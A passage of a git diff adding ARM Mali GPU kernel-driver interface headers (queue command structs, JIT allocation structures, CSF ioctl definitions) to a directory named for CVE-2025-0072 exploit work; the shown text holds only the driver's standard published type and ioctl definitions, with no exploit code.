((base_context_create_flags)1 << 2) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | \ + BASE_CONTEXT_CSF_EVENT_THREAD | \ + BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* Flags for base tracepoint specific to CSF */ + +/* Enable KBase tracepoints for CSF builds */ +#define BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS (1 << 2) + +/* Enable additional CSF Firmware side tracepoints */ +#define BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS (1 << 3) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED | \ + BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS | \ + BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS) + +/* Number of pages mapped into the process address space for a bound GPU + * command queue. A pair of input/output pages and a Hw doorbell page + * are mapped to enable direct submission of commands to Hw. + */ +#define BASEP_QUEUE_NR_MMAP_USER_PAGES ((size_t)3) + +#define BASE_QUEUE_MAX_PRIORITY (15U) + +/* Sync32 object fields definition */ +#define BASEP_EVENT32_VAL_OFFSET (0U) +#define BASEP_EVENT32_ERR_OFFSET (4U) +#define BASEP_EVENT32_SIZE_BYTES (8U) + +/* Sync64 object fields definition */ +#define BASEP_EVENT64_VAL_OFFSET (0U) +#define BASEP_EVENT64_ERR_OFFSET (8U) +#define BASEP_EVENT64_SIZE_BYTES (16U) + +/* Sync32 object alignment, equal to its size */ +#define BASEP_EVENT32_ALIGN_BYTES (8U) + +/* Sync64 object alignment, equal to its size */ +#define BASEP_EVENT64_ALIGN_BYTES (16U) + +/* The upper limit for number of objects that could be waited/set per command. + * This limit is now enforced as internally the error inherit inputs are + * converted to 32-bit flags in a __u32 variable occupying a previously padding + * field. + */ +#define BASEP_KCPU_CQS_MAX_NUM_OBJS ((size_t)32) + +/* CSF CSI EXCEPTION_HANDLER_FLAGS */ +#define BASE_CSF_TILER_OOM_EXCEPTION_FLAG (1u << 0) +#define BASE_CSF_EXCEPTION_HANDLER_FLAGS_MASK (BASE_CSF_TILER_OOM_EXCEPTION_FLAG) + +/** + * enum base_kcpu_command_type - Kernel CPU queue command type. + * @BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL: fence_signal, + * @BASE_KCPU_COMMAND_TYPE_FENCE_WAIT: fence_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT: cqs_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET: cqs_set, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION: cqs_wait_operation, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION: cqs_set_operation, + * @BASE_KCPU_COMMAND_TYPE_MAP_IMPORT: map_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT: unmap_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE: unmap_import_force, + * @BASE_KCPU_COMMAND_TYPE_JIT_ALLOC: jit_alloc, + * @BASE_KCPU_COMMAND_TYPE_JIT_FREE: jit_free, + * @BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND: group_suspend, + * @BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER: error_barrier, + */ +enum base_kcpu_command_type { + BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL, + BASE_KCPU_COMMAND_TYPE_FENCE_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_SET, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION, + BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION, + BASE_KCPU_COMMAND_TYPE_MAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE, + BASE_KCPU_COMMAND_TYPE_JIT_ALLOC, + BASE_KCPU_COMMAND_TYPE_JIT_FREE, + BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND, + BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER +}; + +/** + * enum base_queue_group_priority - Priority of a GPU Command Queue Group. + * @BASE_QUEUE_GROUP_PRIORITY_HIGH: GPU Command Queue Group is of high + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_MEDIUM: GPU Command Queue Group is of medium + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_LOW: GPU Command Queue Group is of low + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_REALTIME: GPU Command Queue Group is of real-time + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_COUNT: Number of GPU Command Queue Group + * priority levels. + * + * Currently this is in order of highest to lowest, but if new levels are added + * then those new levels may be out of order to preserve the ABI compatibility + * with previous releases. At that point, ensure assignment to + * the 'priority' member in &kbase_queue_group is updated to ensure it remains + * a linear ordering. + * + * There should be no gaps in the enum, otherwise use of + * BASE_QUEUE_GROUP_PRIORITY_COUNT in kbase must be updated. + */ +enum base_queue_group_priority { + BASE_QUEUE_GROUP_PRIORITY_HIGH = 0, + BASE_QUEUE_GROUP_PRIORITY_MEDIUM, + BASE_QUEUE_GROUP_PRIORITY_LOW, + BASE_QUEUE_GROUP_PRIORITY_REALTIME, + BASE_QUEUE_GROUP_PRIORITY_COUNT +}; + +struct base_kcpu_command_fence_info { + __u64 fence; +}; + +struct base_cqs_wait_info { + __u64 addr; + __u32 val; + __u32 padding; +}; + +struct base_kcpu_command_cqs_wait_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +struct base_cqs_set { + __u64 addr; +}; + +struct base_kcpu_command_cqs_set_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * typedef basep_cqs_data_type - Enumeration of CQS Data Types + * + * @BASEP_CQS_DATA_TYPE_U32: The Data Type of a CQS Object's value + * is an unsigned 32-bit integer + * @BASEP_CQS_DATA_TYPE_U64: The Data Type of a CQS Object's value + * is an unsigned 64-bit integer + */ +typedef enum PACKED { + BASEP_CQS_DATA_TYPE_U32 = 0, + BASEP_CQS_DATA_TYPE_U64 = 1, +} basep_cqs_data_type; + +/** + * typedef basep_cqs_wait_operation_op - Enumeration of CQS Object Wait + * Operation conditions + * + * @BASEP_CQS_WAIT_OPERATION_LE: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Less than or Equal to + * the Wait Operation value + * @BASEP_CQS_WAIT_OPERATION_GT: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Greater than the Wait Operation value + */ +typedef enum { + BASEP_CQS_WAIT_OPERATION_LE = 0, + BASEP_CQS_WAIT_OPERATION_GT = 1, +} basep_cqs_wait_operation_op; + +struct base_cqs_wait_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_wait_operation_info - structure which contains information + * about the Timeline CQS wait objects + * + * @objs: An array of Timeline CQS waits. + * @nr_objs: Number of Timeline CQS waits in the array. + * @inherit_err_flags: Bit-pattern for the CQSs in the array who's error field + * to be served as the source for importing into the + * queue's error-state. + */ +struct base_kcpu_command_cqs_wait_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +/** + * typedef basep_cqs_set_operation_op - Enumeration of CQS Set Operations + * + * @BASEP_CQS_SET_OPERATION_ADD: CQS Set operation for adding a value + * to a synchronization object + * @BASEP_CQS_SET_OPERATION_SET: CQS Set operation for setting the value + * of a synchronization object + */ +typedef enum { + BASEP_CQS_SET_OPERATION_ADD = 0, + BASEP_CQS_SET_OPERATION_SET = 1, +} basep_cqs_set_operation_op; + +struct base_cqs_set_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_set_operation_info - structure which contains information + * about the Timeline CQS set objects + * + * @objs: An array of Timeline CQS sets. + * @nr_objs: Number of Timeline CQS sets in the array. + * @padding: Structure padding, unused bytes. + */ +struct base_kcpu_command_cqs_set_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * struct base_kcpu_command_import_info - structure which contains information + * about the imported buffer. + * + * @handle: Address of imported user buffer. + */ +struct base_kcpu_command_import_info { + __u64 handle; +}; + +/** + * struct base_kcpu_command_jit_alloc_info - structure which contains + * information about jit memory allocation. + * + * @info: An array of elements of the + * struct base_jit_alloc_info type. + * @count: The number of elements in the info array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_alloc_info { + __u64 info; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_jit_free_info - structure which contains + * information about jit memory which is to be freed. + * + * @ids: An array containing the JIT IDs to free. + * @count: The number of elements in the ids array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_free_info { + __u64 ids; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_group_suspend_info - structure which contains + * suspend buffer data captured for a suspended queue group. + * + * @buffer: Pointer to an array of elements of the type char. + * @size: Number of elements in the @buffer array. + * @group_handle: Handle to the mapping of CSG. + * @padding: padding to a multiple of 64 bits. + */ +struct base_kcpu_command_group_suspend_info { + __u64 buffer; + __u32 size; + __u8 group_handle; + __u8 padding[3]; +}; + + +/** + * struct base_kcpu_command - kcpu command. + * @type: type of the kcpu command, one enum base_kcpu_command_type + * @padding: padding to a multiple of 64 bits + * @info: structure which contains information about the kcpu command; + * actual type is determined by @p type + * @info.fence: Fence + * @info.cqs_wait: CQS wait + * @info.cqs_set: CQS set + * @info.cqs_wait_operation: CQS wait operation + * @info.cqs_set_operation: CQS set operation + * @info.import: import + * @info.jit_alloc: JIT allocation + * @info.jit_free: JIT deallocation + * @info.suspend_buf_copy: suspend buffer copy + * @info.sample_time: sample time + * @info.padding: padding + */ +struct base_kcpu_command { + __u8 type; + __u8 padding[sizeof(__u64) - sizeof(__u8)]; + union { + struct base_kcpu_command_fence_info fence; + struct base_kcpu_command_cqs_wait_info cqs_wait; + struct base_kcpu_command_cqs_set_info cqs_set; + struct base_kcpu_command_cqs_wait_operation_info cqs_wait_operation; + struct base_kcpu_command_cqs_set_operation_info cqs_set_operation; + struct base_kcpu_command_import_info import; + struct base_kcpu_command_jit_alloc_info jit_alloc; + struct base_kcpu_command_jit_free_info jit_free; + struct base_kcpu_command_group_suspend_info suspend_buf_copy; + __u64 padding[2]; /* No sub-struct should be larger */ + } info; +}; + +/** + * struct basep_cs_stream_control - CSI capabilities. + * + * @features: Features of this stream + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_stream_control { + __u32 features; + __u32 padding; +}; + +/** + * struct basep_cs_group_control - CSG interface capabilities. + * + * @features: Features of this group + * @stream_num: Number of streams in this group + * @suspend_size: Size in bytes of the suspend buffer for this group + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_group_control { + __u32 features; + __u32 stream_num; + __u32 suspend_size; + __u32 padding; +}; + +/** + * struct base_gpu_queue_group_error_fatal_payload - Unrecoverable fault + * error information associated with GPU command queue group. + * + * @sideband: Additional information of the unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). + * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_group_error_fatal_payload { + __u64 sideband; + __u32 status; + __u32 padding; +}; + +/** + * struct base_gpu_queue_error_fatal_payload - Unrecoverable fault + * error information related to GPU command queue. + * + * @sideband: Additional information about this unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). + * @csi_index: Index of the CSF interface the queue is bound to. + * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_error_fatal_payload { + __u64 sideband; + __u32 status; + __u8 csi_index; + __u8 padding[3]; +}; + +/** + * enum base_gpu_queue_group_error_type - GPU Fatal error type. + * + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL: Fatal error associated with GPU + * command queue group. + * @BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL: Fatal error associated with GPU + * command queue. + * @BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT: Fatal error associated with + * progress timeout. + * @BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM: Fatal error due to running out + * of tiler heap memory. + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT: The number of fatal error types + * + * This type is used for &struct_base_gpu_queue_group_error.error_type. + */ +enum base_gpu_queue_group_error_type { + BASE_GPU_QUEUE_GROUP_ERROR_FATAL = 0, + BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL, + BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT, + BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM, + BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT +}; + +/** + * struct base_gpu_queue_group_error - Unrecoverable fault information + * @error_type: Error type of @base_gpu_queue_group_error_type + * indicating which field in union payload is filled + * @padding: Unused bytes for 64bit boundary + * @payload: Input Payload + * @payload.fatal_group: Unrecoverable fault error associated with + * GPU command queue group + * @payload.fatal_queue: Unrecoverable fault error associated with command queue + */ +struct base_gpu_queue_group_error { + __u8 error_type; + __u8 padding[7]; + union { + struct base_gpu_queue_group_error_fatal_payload fatal_group; + struct base_gpu_queue_error_fatal_payload fatal_queue; + } payload; +}; + +/** + * enum base_csf_notification_type - Notification type + * + * @BASE_CSF_NOTIFICATION_EVENT: Notification with kernel event + * @BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR: Notification with GPU fatal + * error + * @BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP: Notification with dumping cpu + * queue + * @BASE_CSF_NOTIFICATION_COUNT: The number of notification type + * + * This type is used for &struct_base_csf_notification.type. + */ +enum base_csf_notification_type { + BASE_CSF_NOTIFICATION_EVENT = 0, + BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR, + BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP, + BASE_CSF_NOTIFICATION_COUNT +}; + +/** + * struct base_csf_notification - Event or error notification + * + * @type: Notification type of @base_csf_notification_type + * @padding: Padding for 64bit boundary + * @payload: Input Payload + * @payload.align: To fit the struct into a 64-byte cache line + * @payload.csg_error: CSG error + * @payload.csg_error.handle: Handle of GPU command queue group associated with + * fatal error + * @payload.csg_error.padding: Padding + * @payload.csg_error.error: Unrecoverable fault error + * + */ +struct base_csf_notification { + __u8 type; + __u8 padding[7]; + union { + struct { + __u8 handle; + __u8 padding[7]; + struct base_gpu_queue_group_error error; + } csg_error; + + __u8 align[56]; + } payload; +}; + +/** + * struct mali_base_gpu_core_props - GPU core props info + * + * @product_id: Pro specific value. + * @version_status: Status of the GPU release. No defined values, but starts at + * 0 and increases by one for each release status (alpha, beta, EAC, etc.). + * 4 bit values (0-15). + * @minor_revision: Minor release number of the GPU. "P" part of an "RnPn" + * release number. + * 8 bit values (0-255). + * @major_revision: Major release number of the GPU. "R" part of an "RnPn" + * release number. + * 4 bit values (0-15). + * @padding: padding to align to 8-byte + * @gpu_freq_khz_max: The maximum GPU frequency. Reported to applications by + * clGetDeviceInfo() + * @log2_program_counter_size: Size of the shader program counter, in bits. + * @texture_features: TEXTURE_FEATURES_x registers, as exposed by the GPU. This + * is a bitpattern where a set bit indicates that the format is supported. + * Before using a texture format, it is recommended that the corresponding + * bit be checked. + * @gpu_available_memory_size: Theoretical maximum memory available to the GPU. + * It is unlikely that a client will be able to allocate all of this memory + * for their own purposes, but this at least provides an upper bound on the + * memory available to the GPU. + * This is required for OpenCL's clGetDeviceInfo() call when + * CL_DEVICE_GLOBAL_MEM_SIZE is requested, for OpenCL GPU devices. The + * client will not be expecting to allocate anywhere near this value. + */ +struct mali_base_gpu_core_props { + __u32 product_id; + __u16 version_status; + __u16 minor_revision; + __u16 major_revision; + __u16 padding; + __u32 gpu_freq_khz_max; + __u32 log2_program_counter_size; + __u32 texture_features[BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS]; + __u64 gpu_available_memory_size; +}; + +#endif /* _UAPI_BASE_CSF_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_kernel.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_kernel.h new file mode 100644 index 0000000..c0b4d50 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_base_kernel.h @@ -0,0 +1,287 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2010-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +/* + * Base structures shared with the kernel. + */ + +#ifndef _UAPI_BASE_KERNEL_H_ +#define _UAPI_BASE_KERNEL_H_ + +#include + +#define BASE_MAX_COHERENT_GROUPS 16 + +/* Physical memory group ID for normal usage. + */ +#define BASE_MEM_GROUP_DEFAULT (0) + +/* Physical memory group ID for explicit SLC allocations. + */ +#define BASE_MEM_GROUP_PIXEL_SLC_EXPLICIT (2) + +/* Number of physical memory groups. + */ +#define BASE_MEM_GROUP_COUNT (16) + +/** + * typedef base_mem_alloc_flags - Memory allocation, access/hint flags. + * + * A combination of MEM_PROT/MEM_HINT flags must be passed to each allocator + * in order to determine the best cache policy. Some combinations are + * of course invalid (e.g. MEM_PROT_CPU_WR | MEM_HINT_CPU_RD), + * which defines a write-only region on the CPU side, which is + * heavily read by the CPU... + * Other flags are only meaningful to a particular allocator. + * More flags can be added to this list, as long as they don't clash + * (see BASE_MEM_FLAGS_NR_BITS for the number of the first free bit). + */ +typedef __u32 base_mem_alloc_flags; + + +struct base_mem_handle { + struct { + __u64 handle; + } basep; +}; + +/** + * enum base_mem_import_type - Memory types supported by @a base_mem_import + * + * @BASE_MEM_IMPORT_TYPE_INVALID: Invalid type + * @BASE_MEM_IMPORT_TYPE_UMM: UMM import. Handle type is a file descriptor (int) + * @BASE_MEM_IMPORT_TYPE_USER_BUFFER: User buffer import. Handle is a + * base_mem_import_user_buffer + * + * Each type defines what the supported handle type is. + * + * If any new type is added here ARM must be contacted + * to allocate a numeric value for it. + * Do not just add a new type without synchronizing with ARM + * as future releases from ARM might include other new types + * which could clash with your custom types. + */ +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. + */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/* + * struct base_fence - Cross-device synchronisation fence. + * + * A fence is used to signal when the GPU has finished accessing a resource that + * may be shared with other devices, and also to delay work done asynchronously + * by the GPU until other devices have finished accessing a shared resource. + */ +struct base_fence { + struct { + int fd; + int stream_fd; + } basep; +}; + +/** + * struct base_mem_aliasing_info - Memory aliasing info + * + * @handle: Handle to alias, can be BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * @offset: Offset within the handle to start aliasing from, in pages. + * Not used with BASE_MEM_WRITE_ALLOC_PAGES_HANDLE. + * @length: Length to alias, in pages. For BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * specifies the number of times the special page is needed. + * + * Describes a memory handle to be aliased. + * A subset of the handle can be chosen for aliasing, given an offset and a + * length. + * A special handle BASE_MEM_WRITE_ALLOC_PAGES_HANDLE is used to represent a + * region where a special page is mapped with a write-alloc cache setup, + * typically used when the write result of the GPU isn't needed, but the GPU + * must write anyway. + * + * Offset and length are specified in pages. + * Offset must be within the size of the handle. + * Offset+length must not overrun the size of the handle. + */ +struct base_mem_aliasing_info { + struct base_mem_handle handle; + __u64 offset; + __u64 length; +}; + +/* Maximum percentage of just-in-time memory allocation trimming to perform + * on free. + */ +#define BASE_JIT_MAX_TRIM_LEVEL (100) + +/* Maximum number of concurrent just-in-time memory allocations. + */ +#define BASE_JIT_ALLOC_COUNT (255) + +/* base_jit_alloc_info in use for kernel driver versions 10.2 to early 11.5 + * + * jit_version is 1 + * + * Due to the lack of padding specified, user clients between 32 and 64-bit + * may have assumed a different size of the struct + * + * An array of structures was not supported + */ +struct base_jit_alloc_info_10_2 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; +}; + +/* base_jit_alloc_info introduced by kernel driver version 11.5, and in use up + * to 11.19 + * + * This structure had a number of modifications during and after kernel driver + * version 11.5, but remains size-compatible throughout its version history, and + * with earlier variants compatible with future variants by requiring + * zero-initialization to the unused space in the structure. + * + * jit_version is 2 + * + * Kernel driver version history: + * 11.5: Initial introduction with 'usage_id' and padding[5]. All padding bytes + * must be zero. Kbase minor version was not incremented, so some + * versions of 11.5 do not have this change. + * 11.5: Added 'bin_id' and 'max_allocations', replacing 2 padding bytes (Kbase + * minor version not incremented) + * 11.6: Added 'flags', replacing 1 padding byte + * 11.10: Arrays of this structure are supported + */ +struct base_jit_alloc_info_11_5 { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; +}; + +/** + * struct base_jit_alloc_info - Structure which describes a JIT allocation + * request. + * @gpu_alloc_addr: The GPU virtual address to write the JIT + * allocated GPU virtual address to. + * @va_pages: The minimum number of virtual pages required. + * @commit_pages: The minimum number of physical pages which + * should back the allocation. + * @extension: Granularity of physical pages to grow the + * allocation by during a fault. + * @id: Unique ID provided by the caller, this is used + * to pair allocation and free requests. + * Zero is not a valid value. + * @bin_id: The JIT allocation bin, used in conjunction with + * @max_allocations to limit the number of each + * type of JIT allocation. + * @max_allocations: The maximum number of allocations allowed within + * the bin specified by @bin_id. Should be the same + * for all allocations within the same bin. + * @flags: flags specifying the special requirements for + * the JIT allocation, see + * %BASE_JIT_ALLOC_VALID_FLAGS + * @padding: Expansion space - should be initialised to zero + * @usage_id: A hint about which allocation should be reused. + * The kernel should attempt to use a previous + * allocation with the same usage_id + * @heap_info_gpu_addr: Pointer to an object in GPU memory describing + * the actual usage of the region. + * + * jit_version is 3. + * + * When modifications are made to this structure, it is still compatible with + * jit_version 3 when: a) the size is unchanged, and b) new members only + * replace the padding bytes. + * + * Previous jit_version history: + * jit_version == 1, refer to &base_jit_alloc_info_10_2 + * jit_version == 2, refer to &base_jit_alloc_info_11_5 + * + * Kbase version history: + * 11.20: added @heap_info_gpu_addr + */ +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +enum base_external_resource_access { + BASE_EXT_RES_ACCESS_SHARED, + BASE_EXT_RES_ACCESS_EXCLUSIVE +}; + +struct base_external_resource { + __u64 ext_resource; +}; + +/** + * BASE_EXT_RES_COUNT_MAX - The maximum number of external resources + * which can be mapped/unmapped in a single request. + */ +#define BASE_EXT_RES_COUNT_MAX 10 + +/** + * struct base_external_resource_list - Structure which describes a list of + * external resources. + * @count: The number of resources. + * @ext_res: Array of external resources which is + * sized at allocation time. + */ +struct base_external_resource_list { + __u64 count; + struct base_external_resource ext_res[1]; +}; + +#endif /* _UAPI_BASE_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_csf_ioctl.h b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_csf_ioctl.h new file mode 100644 index 0000000..91249ca --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE-2025-0072/mali_kbase_csf_ioctl.h @@ -0,0 +1,556 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_KBASE_CSF_IOCTL_H_ +#define _UAPI_KBASE_CSF_IOCTL_H_ + +#include +#include + +/* + * 1.0: + * - CSF IOCTL header separated from JM + * 1.1: + * - Add a new priority level BASE_QUEUE_GROUP_PRIORITY_REALTIME + * - Add ioctl 54: This controls the priority setting. + * 1.2: + * - Add new CSF GPU_FEATURES register into the property structure + * returned by KBASE_IOCTL_GET_GPUPROPS + * 1.3: + * - Add __u32 group_uid member to + * &struct_kbase_ioctl_cs_queue_group_create.out + * 1.4: + * - Replace padding in kbase_ioctl_cs_get_glb_iface with + * instr_features member of same size + * 1.5: + * - Add ioctl 40: kbase_ioctl_cs_queue_register_ex, this is a new + * queue registration call with extended format for supporting CS + * trace configurations with CSF trace_command. + * 1.6: + * - Added new HW performance counters interface to all GPUs. + * 1.7: + * - Added reserved field to QUEUE_GROUP_CREATE ioctl for future use + * 1.8: + * - Removed Kernel legacy HWC interface + * 1.9: + * - Reorganization of GPU-VA memory zones, including addition of + * FIXED_VA zone and auto-initialization of EXEC_VA zone. + * - Added new Base memory allocation interface + * 1.10: + * - First release of new HW performance counters interface. + * 1.11: + * - Dummy model (no mali) backend will now clear HWC values after each sample + * 1.12: + * - Added support for incremental rendering flag in CSG create call + * 1.13: + * - Added ioctl to query a register of USER page. + * 1.14: + * - Added support for passing down the buffer descriptor VA in tiler heap init + */ + +#define BASE_UK_VERSION_MAJOR 1 +#define BASE_UK_VERSION_MINOR 14 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + +/** + * struct kbase_ioctl_cs_queue_register - Register a GPU command queue with the + * base back-end + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * + * Note: There is an identical sub-section in kbase_ioctl_cs_queue_register_ex. + * Any change of this struct should also be mirrored to the latter. + */ +struct kbase_ioctl_cs_queue_register { + __u64 buffer_gpu_addr; + __u32 buffer_size; + __u8 priority; + __u8 padding[3]; +}; + +#define KBASE_IOCTL_CS_QUEUE_REGISTER \ + _IOW(KBASE_IOCTL_TYPE, 36, struct kbase_ioctl_cs_queue_register) + +/** + * struct kbase_ioctl_cs_queue_kick - Kick the GPU command queue group scheduler + * to notify that a queue has been updated + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + */ +struct kbase_ioctl_cs_queue_kick { + __u64 buffer_gpu_addr; +}; + +#define KBASE_IOCTL_CS_QUEUE_KICK \ + _IOW(KBASE_IOCTL_TYPE, 37, struct kbase_ioctl_cs_queue_kick) + +/** + * union kbase_ioctl_cs_queue_bind - Bind a GPU command queue to a group + * + * @in: Input parameters + * @in.buffer_gpu_addr: GPU address of the buffer backing the queue + * @in.group_handle: Handle of the group to which the queue should be bound + * @in.csi_index: Index of the CSF interface the queue should be bound to + * @in.padding: Currently unused, must be zero + * @out: Output parameters + * @out.mmap_handle: Handle to be used for creating the mapping of CS + * input/output pages + */ +union kbase_ioctl_cs_queue_bind { + struct { + __u64 buffer_gpu_addr; + __u8 group_handle; + __u8 csi_index; + __u8 padding[6]; + } in; + struct { + __u64 mmap_handle; + } out; +}; + +#define KBASE_IOCTL_CS_QUEUE_BIND \ + _IOWR(KBASE_IOCTL_TYPE, 39, union kbase_ioctl_cs_queue_bind) + +/** + * struct kbase_ioctl_cs_queue_register_ex - Register a GPU command queue with the + * base back-end in extended format, + * involving trace buffer configuration + * + * @buffer_gpu_addr: GPU address of the buffer backing the queue + * @buffer_size: Size of the buffer in bytes + * @priority: Priority of the queue within a group when run within a process + * @padding: Currently unused, must be zero + * @ex_offset_var_addr: GPU address of the trace buffer write offset variable + * @ex_buffer_base: Trace buffer GPU base address for the queue + * @ex_buffer_size: Size of the trace buffer in bytes + * @ex_event_size: Trace event write size, in log2 designation + * @ex_event_state: Trace event states configuration + * @ex_padding: Currently unused, must be zero + * + * Note: There is an identical sub-section at the start of this struct to that + * of @ref kbase_ioctl_cs_queue_register. Any change of this sub-section + * must also be mirrored to the latter. Following the said sub-section, + * the remaining fields forms the extension, marked with ex_*. + */ +struct kbase_ioctl_cs_queue_register_ex { + __u64 